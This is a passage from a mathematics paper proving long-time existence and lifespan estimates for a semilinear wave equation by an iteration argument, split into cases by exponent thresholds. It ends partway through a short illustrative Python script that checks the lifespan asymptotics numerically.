J_{32}'\lesssim& \int_{\Lambda_{32}}\kl<s+\rho\kr>^{\frac{(1-n)p+n+A-2}{2}}\beta(s-\rho)^{-p}\kl({t-r}\kr)^{\frac{1-A}{2}}\d\rho\d s\\
\lesssim &\kl<t-r\kr>^{\frac{1-A}{2}}\int_6^{(t-r)/2}\int_2^{\xi/3}\kl<\xi\kr>^{\frac{(1-n)p+n+A-2}{2}}\beta(\eta)^{-p} \d \eta\d\xi.
\end{Eq*}
\value{parta}[Estimate for $A\in[2,3)$]
Turning to the proof of \eqref{Eq:Jijk}, we only present the estimate of $J_{32}$; the other terms can be estimated in a similar manner.
At first,
for $J_{32;1}$ with $p_m<p<p_M$,
we have
\begin{Eq*}
J_{32;1}\lesssim \kl<t-r\kr>^{\frac{1-A}{2}}\int_6^{(t-r)/2}\int_2^{\xi/3}\kl<\xi\kr>^{\frac{(1-n)p+n+A-2}{2}}\kl<\eta\kr>^{-\frac{A-1}{2}p}\d\eta\d\xi.
\end{Eq*}
When $p>p_d=2/(A-1)$,
it is easy to see that
\begin{Eq*}
J_{32;1}\lesssim \kl<t-r\kr>^{\frac{1-A}{2}}\int_6^{(t-r)/2}\kl<\xi\kr>^{\frac{(1-n)p+n+A-2}{2}}\d\xi \lesssim N_1(t-r).
\end{Eq*}
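To unpack the last step: for $p>p_d$ the $\eta$-integral converges, and the remaining $\xi$-integral is controlled according to whether its exponent is below, equal to, or above $-1$; the borderline is $p=p_t=\frac{n+A}{n-1}$, and
\begin{Eq*}
\int_6^{(t-r)/2}\kl<\xi\kr>^{\frac{(1-n)p+n+A-2}{2}}\d\xi\lesssim
\begin{cases}
1,&p>p_t,\\
\ln\kl<t-r\kr>,&p=p_t,\\
\kl<t-r\kr>^{\frac{(1-n)p+n+A}{2}},&p<p_t,
\end{cases}
\end{Eq*}
which, after multiplying by the prefactor $\kl<t-r\kr>^{\frac{1-A}{2}}$, reproduces the corresponding branches of $N_1(t-r)$.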
Similarly, when $p\le p_d$,
we have
\begin{Eq*}
J_{32;1}\lesssim
\begin{cases}
\kl<t-r\kr>^{\frac{1-A}{2}}\int_6^{(t-r)/2}\kl<\xi\kr>^{\frac{(1-n)p+n+A-2}{2}}\ln\xi\d\xi, & p=p_d,\\
\kl<t-r\kr>^{\frac{1-A}{2}}\int_6^{(t-r)/2}\kl<\xi\kr>^{\frac{(-n-A+2)p+n+A}{2}}\d\xi,& p<p_d,
\end{cases}
\end{Eq*}
which are controlled by $N_1(t-r)$; this finishes the proof of \eqref{Eq:v_e} with $k=1$.
For $J_{32;2}$ with $p_m<p<p_t$, we have
\begin{Eq*}
J_{32;2}\lesssim& \kl<t-r\kr>^{\frac{1-A}{2}}\int_6^{(t-r)/2}\kl<\xi\kr>^{\frac{(1-n)p+n+A-2}{2}}\d\xi\int_2^{(t-r)/6}\kl<\eta\kr>^{\frac{(1-n)p^2+(n+1)p}{2}} \d \eta\\
\lesssim&\kl<t-r\kr>^{\frac{(1-n)p+n+1}{2}}\int_2^{(t-r)/6}\kl<\eta\kr>^{\frac{(1-n)p^2+(n+1)p}{2}} \d \eta\lesssim N_2(t-r).
\end{Eq*}
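Here the three branches of $N_2$ come from the last $\eta$-integral: its exponent crosses $-1$ exactly at $p=p_S$, the positive root of $(n-1)p^2-(n+1)p-2=0$, and
\begin{Eq*}
\int_2^{(t-r)/6}\kl<\eta\kr>^{\frac{(1-n)p^2+(n+1)p}{2}} \d \eta\lesssim
\begin{cases}
1,&p_S<p,\\
\ln \kl<t-r\kr>,&p=p_S,\\
\kl<t-r\kr>^{\frac{(1-n)p^2+(n+1)p+2}{2}},&p<p_S.
\end{cases}
\end{Eq*}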
Finally, for $J_{32;3}$ with $p=p_t>p_d$, we have
\begin{Eq*}
J_{32;3}\lesssim& \kl<t-r\kr>^{\frac{1-A}{2}}\int_6^{(t-r)/2}\int_2^{\xi/3}\kl<\xi\kr>^{-1}\kl<\eta\kr>^{\frac{(1-A)p}{2}} (\ln\eta)^{p}\d \eta\d\xi\\
\lesssim& \kl<t-r\kr>^{\frac{1-A}{2}}\int_6^{(t-r)/2}\kl<\xi\kr>^{-1} \d\xi\lesssim \kl<t-r\kr>^{\frac{1-A}{2}}\ln\kl<t-r\kr>= N_3(t-r).
\end{Eq*}
In conclusion, this completes the proof for $A\in[2,3)$.
\value{parta}[Estimate for $A=3$]
The case $A=3$ is much simpler: thanks to \eqref{Eq:I_p_5}, we only need to consider $\Lambda_{11}$ and $\Lambda_{12}$. By \eqref{Eq:I_p_6} and an argument similar to the above, we obtain the desired estimate.
\end{proof}
\subsection{Long-time existence}
In this subsection,
we will construct a Cauchy sequence to approximate the desired solution.
We set $u_{-1}=0$ and let $u_{j+1}$ be the solution of the equation
\begin{Eq}\label{Eq:uj_o}
\begin{cases}
\partial_t^2 u_{j+1} -\Delta_Au_{j+1}=r^{\frac{(A-n)p+n-A}{2}}|u_{j}|^p,\quad r\in {\mathbb{R}}_+,\\
u_{j+1}(0,x)=\varepsilon r^{\frac{n-A}{2}}U_0(r),\quad \partial_t u_{j+1}(0,x)=\varepsilon r^{\frac{n-A}{2}}U_1(r).
\end{cases}
\end{Eq}
By \Le{Le:u0_e} and \Le{Le:v_e}, together with the elementary inequality, valid for any $p>1$,
\begin{Eq*}
\kl||a|^p-|b|^p\kr|\lesssim |a-b|\max(|a|,|b|)^{p-1},
\end{Eq*}
we see
\begin{Eq*}
\kl<t+r\kr>^\frac{A-1}{2}|u_{j+1}|\leq& \varepsilon C_0\kl<t-r\kr>^\frac{1-A}{2}\Psi+C_0N_k(t-r)\|\omega_k u_j\|_{L_{s,\rho}^\infty(\Lambda)}^p,\\
\kl<t+r\kr>^\frac{A-1}{2}|u_{j+1}-u_{j}|\leq& C_0N_k(t-r)\|\omega_k (u_j-u_{j-1})\|_{L_{s,\rho}^\infty(\Lambda)}\max_{l\in\{j,j-1\}}\|\omega_k u_l\|_{L_{s,\rho}^\infty(\Lambda)}^{p-1},
\end{Eq*}
with $k=1,2,3$ and $C_0$ large enough.
Here
\begin{Eq*}
\Psi:=&\|r^\frac{n-A+2}{2}U_0'(r)\|_{L_r^\infty}+\|r^\frac{n-A}{2}U_0(r)\|_{L_r^\infty}+\|r^\frac{n-A+2}{2}U_1(r)\|_{L_r^\infty},\\
\Lambda(t,r):=&\kl\{(s,\rho)\in\Omega: s+\rho<t+r,s-\rho<t-r\kr\},\\
\Omega:=&\kl\{(t,r)\in {\mathbb{R}}_+^2:t>r-1\kr\}.
\end{Eq*}
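The elementary inequality used above follows from the fundamental theorem of calculus: assuming without loss of generality that $|a|\geq|b|$, we have
\begin{Eq*}
\kl||a|^p-|b|^p\kr|=\int_{|b|}^{|a|} p\tau^{p-1}\d\tau\leq p\kl(|a|-|b|\kr)|a|^{p-1}\leq p|a-b|\max(|a|,|b|)^{p-1},
\end{Eq*}
where the last step uses $\kl||a|-|b|\kr|\leq|a-b|$.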
To prove \Th{Th:M_1}, we need to split $p\in(p_m,p_M)$ into more cases than those in \eqref{Eq:Main_7}, \eqref{Eq:Main_8} or \eqref{Eq:Main_9}. For the reader's convenience, we list them below. When $(3-A)(A+n+2)<8$, we have $p_d<p_F<p_S<p_t$; the proof for $p<p_d$ is given in \Pt{Pt:4}, for $p=p_d$ in \Pt{Pt:6}, for $p_d<p<p_S$ in \Pt{Pt:8}, for $p=p_S$ in \Pt{Pt:9}, for $p_S<p<p_t$ in \Pt{Pt:3}, for $p=p_t$ in \Pt{Pt:2} and for $p>p_t$ in \Pt{Pt:1}. When $(3-A)(A+n+2)=8$, we have $p_d=p_F=p_S=p_t$; the proof for $p<p_d$ is given in \Pt{Pt:4}, for $p=p_d$ in \Pt{Pt:7} and for $p>p_d$ in \Pt{Pt:1}. Finally, when $(3-A)(A+n+2)>8$, we have $p_d>p_F>p_S>p_t$; the proof for $p<p_F$ is given in \Pt{Pt:4}, for $p=p_F$ in \Pt{Pt:5} and for $p>p_F$ in \Pt{Pt:1}.
Now, we are prepared to give the proofs for each part.
\setcounter{part0}{0}
\value{parta}[$\max(p_t,p_F)<p$]\label{Pt:1}
In this part, we choose $k=1$. For $(t,r)\in\Omega$ we find
\begin{Eq*}
\omega_1|u_{j+1}|\leq& \varepsilon C_0\Psi+C_0\|\omega_1 u_j\|_{L_{s,\rho}^\infty(\Lambda)}^p,\\
\omega_1|u_{j+1}-u_j|\leq& C_0\|\omega_1 \kl(u_j-u_{j-1}\kr)\|_{L_{s,\rho}^\infty(\Lambda)}\max_{l\in\{j,j-1\}}\|\omega_1 u_l\|_{L_{s,\rho}^\infty(\Lambda)}^{p-1}.
\end{Eq*}
Taking the $L_{t,r}^\infty(\Omega)$ norm on both sides, we get
\begin{Eq*}
\kl\|\omega_1u_{j+1}\kr\|_{L_{t,r}^\infty(\Omega)}\leq& \varepsilon C_0\Psi+C_0\|\omega_1 u_j\|_{L_{t,r}^\infty(\Omega)}^p,\\
\kl\|\omega_1(u_{j+1}-u_j)\kr\|_{L_{t,r}^\infty(\Omega)}\leq& C_0\|\omega_1 \kl(u_j-u_{j-1}\kr)\|_{L_{t,r}^\infty(\Omega)}\max_{l\in\{j,j-1\}}\|\omega_1 u_l\|_{L_{t,r}^\infty(\Omega)}^{p-1}.
\end{Eq*}
For any $\varepsilon>0$ satisfying $(2\varepsilon C_0\Psi)^p<\varepsilon \Psi$, we find
\begin{Eq*}
\kl\|\omega_1u_{j}\kr\|_{L_{t,r}^\infty(\Omega)}\leq 2\varepsilon C_0\Psi
\end{Eq*}
holds for any $j$ by induction, since $u_{-1}=0$. Meanwhile, it also gives us
\begin{Eq*}
\kl\|\omega_1(u_{j+1}-u_j)\kr\|_{L_{t,r}^\infty(\Omega)}\leq& C_0\kl(2\varepsilon C_0\Psi\kr)^{p-1}\|\omega_1 \kl(u_j-u_{j-1}\kr)\|_{L_{t,r}^\infty(\Omega)}\\
\leq &\frac{1}{2}\|\omega_1 \kl(u_j-u_{j-1}\kr)\|_{L_{t,r}^\infty(\Omega)}.
\end{Eq*}
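For completeness, we record the induction behind the uniform bound: if $\kl\|\omega_1u_{j}\kr\|_{L_{t,r}^\infty(\Omega)}\leq 2\varepsilon C_0\Psi$, then the first inequality above and the smallness condition $(2\varepsilon C_0\Psi)^p<\varepsilon \Psi$ give
\begin{Eq*}
\kl\|\omega_1u_{j+1}\kr\|_{L_{t,r}^\infty(\Omega)}\leq \varepsilon C_0\Psi+C_0\kl(2\varepsilon C_0\Psi\kr)^{p}\leq \varepsilon C_0\Psi+\varepsilon C_0\Psi=2\varepsilon C_0\Psi.
\end{Eq*}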
This means $\{u_j\}$ is a Cauchy sequence in the weighted $L^\infty$ norm.
Denote its limit by $u$. It is easy to check that $u$ and $F=r^{\frac{(A-n)p+n-A}{2}}|u|^p$ satisfy \eqref{Eq:u_i_r} since $p>p_F$. Thus we get the desired global weak solution.
\value{parta}[$p_S<p_t=p$]\label{Pt:2}
In this part we take $k=3$. For $(t,r)\in\Omega$ we find
\begin{Eq*}
\omega_3|u_{j+1}|\leq& \varepsilon C_0(\ln\kl<t-r\kr>)^{-1}\Psi+C_0\|\omega_3 u_j\|_{L_{s,\rho}^\infty(\Lambda)}^p,\\
\omega_3|u_{j+1}-u_j|\leq& C_0\|\omega_3 \kl(u_j-u_{j-1}\kr)\|_{L_{s,\rho}^\infty(\Lambda)}\max_{l\in\{j,j-1\}}\|\omega_3 u_l\|_{L_{s,\rho}^\infty(\Lambda)}^{p-1}.
\end{Eq*}
Noticing $\kl<t-r\kr>\geq 2$, by a process similar to the above we get the desired global solution.
\value{parta}[$p_S<p<p_t$]\label{Pt:3}
In this part we take $k=2$. For $(t,r)\in\Omega$ we find
\begin{Eq*}
\omega_2|u_{j+1}|\leq& \varepsilon C_0\kl<t-r\kr>^{\frac{(n-1)p-n-A}{2}}\Psi+C_0\|\omega_2 u_j\|_{L_{s,\rho}^\infty(\Lambda)}^p,\\
\omega_2|u_{j+1}-u_j|\leq& C_0\|\omega_2 \kl(u_j-u_{j-1}\kr)\|_{L_{s,\rho}^\infty(\Lambda)}\max_{l\in\{j,j-1\}}\|\omega_2 u_l\|_{L_{s,\rho}^\infty(\Lambda)}^{p-1}.
\end{Eq*}
Here $\frac{(n-1)p-n-A}{2}\leq 0$ since $p<p_t$; by a similar process we again get the desired global solution.
\value{parta}[$p<\min(p_d,p_F)$]\label{Pt:4}
In this case, we choose $T_*=T_*(\varepsilon)$ which satisfies $\varepsilon^{p-1}T_*^{\frac{(-n-A+2)p+n+A+2}{2}}=a$ with $a$ to be fixed later. Here we define $\Omega_*:=\Omega\cap \{t:t<T_*\}$ and choose $k=1$. Then for $(t,r)\in\Omega_*$ we find
\begin{Eq*}
\omega_1|u_{j+1}|\leq& \varepsilon C_0\Psi+C_0\kl<t-r\kr>^{\frac{(-n-A+2)p+n+A+2}{2}}\|\omega_1 u_j\|_{L_{s,\rho}^\infty(\Lambda)}^p,\\
\omega_1|u_{j+1}-u_j|\leq& C_0\kl<t-r\kr>^{\frac{(-n-A+2)p+n+A+2}{2}}\|\omega_1 \kl(u_j-u_{j-1}\kr)\|_{L_{s,\rho}^\infty(\Lambda)}\\
&\times\max_{l\in\{j,j-1\}}\|\omega_1 u_l\|_{L_{s,\rho}^\infty(\Lambda)}^{p-1}.
\end{Eq*}
Taking the $L_{t,r}^\infty(\Omega_*)$ norm on both sides,
when $T_*\geq 3$ we get
\begin{Eq*}
\kl\|\omega_1u_{j+1}\kr\|_{L_{t,r}^\infty(\Omega_*)}\leq& \varepsilon C_1\Psi+C_1T_*^{\frac{(-n-A+2)p+n+A+2}{2}}\|\omega_1 u_j\|_{L_{t,r}^\infty(\Omega_*)}^p,\\
\kl\|\omega_1(u_{j+1}-u_j)\kr\|_{L_{t,r}^\infty(\Omega_*)}\leq& C_1T_*^{\frac{(-n-A+2)p+n+A+2}{2}}\|\omega_1 \kl(u_j-u_{j-1}\kr)\|_{L_{t,r}^\infty(\Omega_*)}\\
&\times\max_{l\in\{j,j-1\}}\|\omega_1 u_l\|_{L_{t,r}^\infty(\Omega_*)}^{p-1},
\end{Eq*}
with some $C_1$ large enough.
Considering $\varepsilon$ such that $T_*(\varepsilon)\geq 3$
and defining $a=(2C_1)^{-p}\Psi^{1-p}$,
we conclude that
\begin{Eq*}
\kl\|\omega_1u_{j}\kr\|_{L_{t,r}^\infty(\Omega_*)}\leq& 2\varepsilon C_1\Psi,\\
\kl\|\omega_1(u_{j+1}-u_j)\kr\|_{L_{t,r}^\infty(\Omega_*)}\leq& \frac{1}{2}\|\omega_1 \kl(u_j-u_{j-1}\kr)\|_{L_{t,r}^\infty(\Omega_*)}
\end{Eq*}
for any $j$, which are sufficient to get the desired solution.
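Here the choice of $a$ is exactly what closes the bootstrap: by the definition of $T_*$ and $a=(2C_1)^{-p}\Psi^{1-p}$,
\begin{Eq*}
C_1T_*^{\frac{(-n-A+2)p+n+A+2}{2}}\kl(2\varepsilon C_1\Psi\kr)^{p}= C_1 a\varepsilon^{1-p}\kl(2C_1\Psi\kr)^{p}\varepsilon^{p}=(2C_1)^{p}\Psi^{p-1}a\cdot\varepsilon C_1\Psi=\varepsilon C_1\Psi,
\end{Eq*}
so the nonlinear term is absorbed into the bound $2\varepsilon C_1\Psi$.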
\value{parta}[$p=p_F<p_d$]\label{Pt:5}
In this case,
we choose $T_*$ which satisfies $\varepsilon^{p-1}\ln T_*=a$
with $a$ to be fixed later,
$\Omega_*$ as above and $k=1$.
For $(t,r)\in \Omega_*$ we find
\begin{Eq*}
\omega_1|u_{j+1}|\leq& \varepsilon C_0\Psi+C_0\ln\kl<t-r\kr>\|\omega_1 u_j\|_{L_{s,\rho}^\infty(\Lambda)}^p,\\
\omega_1|u_{j+1}-u_j|\leq& C_0\ln\kl<t-r\kr>\|\omega_1 \kl(u_j-u_{j-1}\kr)\|_{L_{s,\rho}^\infty(\Lambda)}\max_{l\in\{j,j-1\}}\|\omega_1 u_l\|_{L_{s,\rho}^\infty(\Lambda)}^{p-1}.
\end{Eq*}
Similar as above,
taking $\varepsilon$ such that $T_*(\varepsilon)\geq 3$,
defining $a:=(2C_1)^{-p}\Psi^{1-p}$ with $C_1$ large enough,
we get the Cauchy sequence $\{u_j\}$ and the desired solution.
\value{parta}[$p=p_d<p_F$]\label{Pt:6}
In this case,
we choose $T_*$ which satisfies
\begin{Eq}\label{Eq:T*_pd}
\varepsilon^{p-1} T_*^\frac{(-n-A+2)p+n+A+2}{2}\ln T_*=a
\end{Eq}
and $\Omega_*$ same as above.
Taking $k=1$,
for $(t,r)\in\Omega_*$ we find
\begin{Eq*}
\omega_1|u_{j+1}|\leq& \varepsilon C_0\Psi+C_0\kl<t-r\kr>^{\frac{(-n-A+2)p+n+A+2}{2}}\ln\kl<t-r\kr>\|\omega_1 u_j\|_{L_{s,\rho}^\infty(\Lambda)}^p,\\
\omega_1|u_{j+1}-u_j|\leq& C_0\kl<t-r\kr>^{\frac{(-n-A+2)p+n+A+2}{2}}\ln\kl<t-r\kr>\|\omega_1 \kl(u_j-u_{j-1}\kr)\|_{L_{s,\rho}^\infty(\Lambda)}\\
&\times\max_{l\in\{j,j-1\}}\|\omega_1 u_l\|_{L_{s,\rho}^\infty(\Lambda)}^{p-1}.
\end{Eq*}
Choosing $\varepsilon$ such that $T_*(\varepsilon)\geq3$,
$a=(2C_1)^{-p}\Psi^{1-p}$ with $C_1$ large enough,
we get the Cauchy sequence $\{u_j\}$ and the desired solution.
To finish the proof of \Th{Th:M_1} for this part,
we introduce the following claim and postpone its proof to the end of this section.
\begin{claim}\label{Cl:T*_pd}
Assume that $T_*$ satisfies $\varepsilon^{p-1} T_*^\frac{-h_F(p)}{2}\ln T_*=a$ with some constant $a$. Then there exist two constants $c_1$, $c_2$ such that $c_1\varepsilon^{\frac{2(p-1)}{h_F(p)}}|\ln \varepsilon |^{\frac{2}{h_F(p)}}\leq T_*\leq c_2\varepsilon^{\frac{2(p-1)}{h_F(p)}}|\ln \varepsilon |^{\frac{2}{h_F(p)}}$ for $\varepsilon$ small enough.
\end{claim}
\value{parta}[$p=p_d=p_F$]\label{Pt:7}
In this case,
we choose $T_*$ which satisfies $\varepsilon^{p-1} (\ln T_*)^2=a$
and $\Omega_*$ same as above.
Taking $k=1$,
for $(t,r)\in\Omega_*$ we find
\begin{Eq*}
\omega_1|u_{j+1}|\leq& \varepsilon C_0\Psi+C_0(\ln \kl<t-r\kr>)^2\|\omega_1 u_j\|_{L_{s,\rho}^\infty(\Lambda)}^p,\\
\omega_1|u_{j+1}-u_j|\leq& C_0(\ln \kl<t-r\kr>)^2\|\omega_1 \kl(u_j-u_{j-1}\kr)\|_{L_{s,\rho}^\infty(\Lambda)}\max_{l\in\{j,j-1\}}\|\omega_1 u_l\|_{L_{s,\rho}^\infty(\Lambda)}^{p-1}.
\end{Eq*}
Choosing $\varepsilon$ such that $T_*(\varepsilon)\geq 3$,
$a=(2C_1)^{-p}\Psi^{1-p}$ and $C_1$ large enough,
we get the Cauchy sequence $\{u_j\}$ and finish the proof.
\value{parta}[$p_d<p<p_S$]\label{Pt:8}
In this case,
we choose $T_*$ which satisfies $\varepsilon^{p(p-1)}T_*^{\frac{(1-n)p^2+(n+1)p+2}{2}}=a$
with $a$ to be fixed later and $\Omega_*$ as above.
Moreover,
we separate the region $\Omega_*$ to
\begin{Eq*}
\Omega_{*1}:=&\Omega_*\cap\{(t,r):\kl<t-r\kr>\leq (b \varepsilon)^{\frac{2(p-1)}{(n-1)p-n-A}}\},\\
\Omega_{*2}:=&\Omega_*\cap\{(t,r):\kl<t-r\kr>\geq (b \varepsilon)^{\frac{2(p-1)}{(n-1)p-n-A}}\},
\end{Eq*}
with $b$ to be fixed later. Firstly we take $k=1$,
for $(t,r)\in\Omega_{*1}$ we find
\begin{Eq*}
\omega_1|u_{j+1}|\leq& \varepsilon C_0\Psi+C_0\kl<t-r\kr>^{\frac{(1-n)p+n+A}{2}}\|\omega_1 u_j\|_{L_{s,\rho}^\infty(\Lambda)}^p,\\
\omega_1|u_{j+1}-u_j|\leq& C_0\kl<t-r\kr>^{\frac{(1-n)p+n+A}{2}}\|\omega_1 \kl(u_j-u_{j-1}\kr)\|_{L_{s,\rho}^\infty(\Lambda)}\max_{l\in\{j,j-1\}}\|\omega_1 u_l\|_{L_{s,\rho}^\infty(\Lambda)}^{p-1}.
\end{Eq*}
Taking the $L_{t,r}^\infty(\Omega_{*1})$ norm on both sides, we get
\begin{Eq*}
\kl\|\omega_1u_{j+1}\kr\|_{L_{t,r}^\infty(\Omega_{*1})}\leq& \varepsilon C_0\Psi+C_0(b\varepsilon)^{1-p}\|\omega_1 u_j\|_{L_{t,r}^\infty(\Omega_{*1})}^p,\\
\kl\|\omega_1(u_{j+1}-u_j)\kr\|_{L_{t,r}^\infty(\Omega_{*1})}\leq& C_0(b\varepsilon)^{1-p}\|\omega_1 \kl(u_j-u_{j-1}\kr)\|_{L_{t,r}^\infty(\Omega_{*1})}\max_{l\in\{j,j-1\}}\|\omega_1 u_l\|_{L_{t,r}^\infty(\Omega_{*1})}^{p-1}.
\end{Eq*}
Choosing $b$ such that $(2C_0)^pb^{1-p}\Psi^{p-1}=1$, we find
\begin{Eq}\label{Eq:u_i_1}
\kl\|\omega_1u_{j}\kr\|_{L_{t,r}^\infty(\Omega_{*1})}\leq& 2\varepsilon C_0\Psi,\\
\kl\|\omega_1(u_{j+1}-u_j)\kr\|_{L_{t,r}^\infty(\Omega_{*1})}\leq& \frac{1}{2}\|\omega_1 \kl(u_j-u_{j-1}\kr)\|_{L_{t,r}^\infty(\Omega_{*1})}
\end{Eq}
holds for any $j$.
This means $\{u_j\}$ is a Cauchy sequence in the weighted $L^\infty$ norm on the region $\Omega_{*1}$.
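For completeness, the choice of $b$ is what makes the nonlinear term on $\Omega_{*1}$ absorbable: since $(2C_0)^pb^{1-p}\Psi^{p-1}=1$,
\begin{Eq*}
C_0(b\varepsilon)^{1-p}\kl(2\varepsilon C_0\Psi\kr)^{p}=(2C_0)^{p}b^{1-p}\Psi^{p-1}\cdot\varepsilon C_0\Psi=\varepsilon C_0\Psi.
\end{Eq*}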
On the other hand, for $(t,r)\in \Omega_{*2}$, we separate $\Lambda$ into $\Lambda_1:=\Lambda\cap \Omega_{*1}$ and $\Lambda_2:=\Lambda\cap \Omega_{*2}$.
By linearity, we can split $u_{j+1}(t,r)$ into two terms, determined by the nonlinear term restricted to $\Lambda_1$ and to $\Lambda_2$ respectively.
Taking $k=1$ in the former region and $k=2$ in the latter region, for $(t,r)\in \Omega_{*2}$ we find
\begin{Eq*}
\omega_2|u_{j+1}|\leq& \varepsilon C_0\kl<t-r\kr>^\frac{(n-1)p-n-A}{2}\Psi+C_0\|\omega_1 u_j\|_{L_{s,\rho}^\infty(\Lambda_1)}^p\\
&+C_0\kl<t-r\kr>^{\frac{(1-n)p^2+(n+1)p+2}{2}}\|\omega_2 u_j\|_{L_{s,\rho}^\infty(\Lambda_2)}^p,\\
\omega_2|u_{j+1}-u_j|\leq& C_0\|\omega_1 \kl(u_j-u_{j-1}\kr)\|_{L_{s,\rho}^\infty(\Lambda_1)} \max_{l\in\{j,j-1\}}\|\omega_1 u_l\|_{L_{s,\rho}^\infty(\Lambda_1)}^{p-1}\\
+C_0\kl<t-r\kr>&{}^{\frac{(1-n)p^2+(n+1)p+2}{2}}\|\omega_2 (u_j-u_{j-1})\|_{L_{s,\rho}^\infty(\Lambda_2)}\max_{l\in\{j,j-1\}}\|\omega_2 u_l\|_{L_{s,\rho}^\infty(\Lambda_2)}^{p-1}.
\end{Eq*}
Taking the $L_{t,r}^\infty(\Omega_{*2})$ norm on both sides,
noticing $\kl<t-r\kr>\geq (b \varepsilon)^{\frac{2(p-1)}{(n-1)p-n-A}}$ for $(t,r)\in \Omega_{*2}$
and $(2C_0)^pb^{1-p}\Psi^{p-1}=1$,
and using the estimate in $\Omega_{*1}$,
when $T_*\geq 3$ we get
\begin{Eq*}
\kl\|\omega_2u_{j+1}\kr\|_{L_{t,r}^\infty(\Omega_{*2})}\leq&C_1(\varepsilon \Psi)^p+C_1T_*^{\frac{(1-n)p^2+(n+1)p+2}{2}}\|\omega_2 u_j\|_{L_{t,r}^\infty(\Omega_{*2})}^p,\\
\kl\|\omega_2(u_{j+1}-u_j)\kr\|_{L_{t,r}^\infty(\Omega_{*2})}\leq& C_1(\varepsilon \Psi)^{p-1}\|\omega_1 \kl(u_j-u_{j-1}\kr)\|_{L_{t,r}^\infty(\Omega_{*1})}\\
+C_1T_*^{\frac{(1-n)p^2+(n+1)p+2}{2}}&\|\omega_2 (u_j-u_{j-1})\|_{L_{t,r}^\infty(\Omega_{*2})}\max_{l\in\{j,j-1\}}\|\omega_2 u_l\|_{L_{t,r}^\infty(\Omega_{*2})}^{p-1},
\end{Eq*}
with some $C_1$ large enough.
Choosing $\varepsilon$ such that $T_*(\varepsilon)\geq 3$ and $a=(2C_1)^{-p}\Psi^{p(1-p)}$, we find
\begin{Eq*}
\kl\|\omega_2u_{j+1}\kr\|_{L_{t,r}^\infty(\Omega_{*2})}\leq&2C_1(\varepsilon \Psi)^p,\\
\kl\|\omega_2(u_{j+1}-u_j)\kr\|_{L_{t,r}^\infty(\Omega_{*2})}\leq& C_1(\varepsilon \Psi)^{p-1}\|\omega_1 \kl(u_j-u_{j-1}\kr)\|_{L_{t,r}^\infty(\Omega_{*1})}\\
&+\frac{1}{2}\|\omega_2 (u_j-u_{j-1})\|_{L_{t,r}^\infty(\Omega_{*2})},
\end{Eq*}
holds for any $j$.
Since we already know that $\{u_j\}$ is a Cauchy sequence on $\Omega_{*1}$, it follows that $\{u_j\}$ is also a Cauchy sequence in the weighted $L^\infty$ norm on $\Omega_{*2}$.
In summary, we get the desired solution.
\value{parta}[$p_d<p=p_S$]\label{Pt:9}
In this part,
we choose $T_*$ which satisfies $\varepsilon^{p(p-1)}\ln T_*=a$
and $\Omega_{*1}$, $\Omega_{*2}$ as above with $a,b$ to be fixed later.
Similarly,
for $(t,r)\in \Omega_{*1}$ we find
\begin{Eq*}
\omega_1|u_{j+1}|\leq& \varepsilon C_0\Psi+C_0\kl<t-r\kr>^{\frac{(1-n)p+n+A}{2}}\|\omega_1 u_j\|_{L_{s,\rho}^\infty(\Lambda)}^p,\\
\omega_1|u_{j+1}-u_j|\leq& C_0\kl<t-r\kr>^{\frac{(1-n)p+n+A}{2}}\|\omega_1 \kl(u_j-u_{j-1}\kr)\|_{L_{s,\rho}^\infty(\Lambda)}\max_{l\in\{j,j-1\}}\|\omega_1 u_l\|_{L_{s,\rho}^\infty(\Lambda)}^{p-1}.
\end{Eq*}
For $(t,r)\in \Omega_{*2}$ we find
\begin{Eq*}
\omega_2|u_{j+1}|\leq& \varepsilon C_0\kl<t-r\kr>^\frac{(n-1)p-n-A}{2}\Psi+C_0\|\omega_1 u_j\|_{L_{s,\rho}^\infty(\Lambda_1)}^p\\
&+C_0\ln\kl<t-r\kr>\|\omega_2 u_j\|_{L_{s,\rho}^\infty(\Lambda_2)}^p,\\
\omega_2|u_{j+1}-u_j|\leq& C_0\|\omega_1 \kl(u_j-u_{j-1}\kr)\|_{L_{s,\rho}^\infty(\Lambda_1)} \max_{l\in\{j,j-1\}}\|\omega_1 u_l\|_{L_{s,\rho}^\infty(\Lambda_1)}^{p-1}\\
&+C_0\ln\kl<t-r\kr>\|\omega_2 (u_j-u_{j-1})\|_{L_{s,\rho}^\infty(\Lambda_2)}\max_{l\in\{j,j-1\}}\|\omega_2 u_l\|_{L_{s,\rho}^\infty(\Lambda_2)}^{p-1}.
\end{Eq*}
Taking $b$ satisfying $(2C_0)^pb^{1-p}\Psi^{p-1}=1$,
choosing $\varepsilon$ such that $T_*(\varepsilon)\geq 3$,
$a=(2C_1)^{-p}\Psi^{p(1-p)}$ and $C_1$ large enough, we get the Cauchy sequence $\{u_j\}$ and the desired solution.
Before ending this section, we give the proof of \Cl{Cl:T*_pd}.
Following \eqref{Eq:T*_pd}, we can easily find
\begin{Eq*}
\varepsilon^{\frac{2(p-1)}{h_F(p)}+\delta}\lesssim T_*\lesssim \varepsilon^{\frac{2(p-1)}{h_F(p)}}
\end{Eq*}
for any $0<\delta\ll1$ and $\varepsilon$ small enough. This suggests defining
\begin{Eq*}
S(\varepsilon):=\varepsilon^{-\frac{2(p-1)}{h_F(p)}}T_*,\qquad \varepsilon^{\delta}\lesssim S\lesssim 1.
\end{Eq*}
Then, \eqref{Eq:T*_pd} goes to
\begin{Eq*}
a=S^\frac{-h_F(p)}{2}\ln\kl(\varepsilon^{\frac{2(p-1)}{h_F(p)}}S\kr)\approx S^\frac{-h_F(p)}{2}|\ln\varepsilon|,
\end{Eq*}
and then
\begin{Eq*}
S\approx |\ln \varepsilon|^{\frac{2}{h_F(p)}},\qquad T_*\approx \varepsilon^{\frac{2(p-1)}{h_F(p)}}|\ln \varepsilon|^{\frac{2}{h_F(p)}},
\end{Eq*}
which finishes the proof.
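As an illustrative numeric check of this asymptotic relation, the short script below solves $a=S^{-h_F(p)/2}\,|\ln(\varepsilon^{2(p-1)/h_F(p)}S)|$ for $S$ and confirms that $S/|\ln\varepsilon|^{2/h_F(p)}$ drifts toward a constant as $\varepsilon\to 0$. The values $h_F(p)=2$, $p=2$, $a=1$ are placeholder assumptions chosen only for this demonstration, not tied to any specific choice of $n$ and $p$.

```python
import math

def solve_S(eps, h=2.0, p=2.0, a=1.0):
    # Solve a = S^(-h/2) * |ln(eps^(2(p-1)/h) * S)| for S by bisection.
    def f(S):
        return S ** (-h / 2) * abs(math.log(eps ** (2 * (p - 1) / h) * S)) - a
    lo, hi = 1e-6, 1e12          # f(lo) > 0 > f(hi) for small eps
    for _ in range(200):
        mid = math.sqrt(lo * hi)  # geometric bisection over many decades
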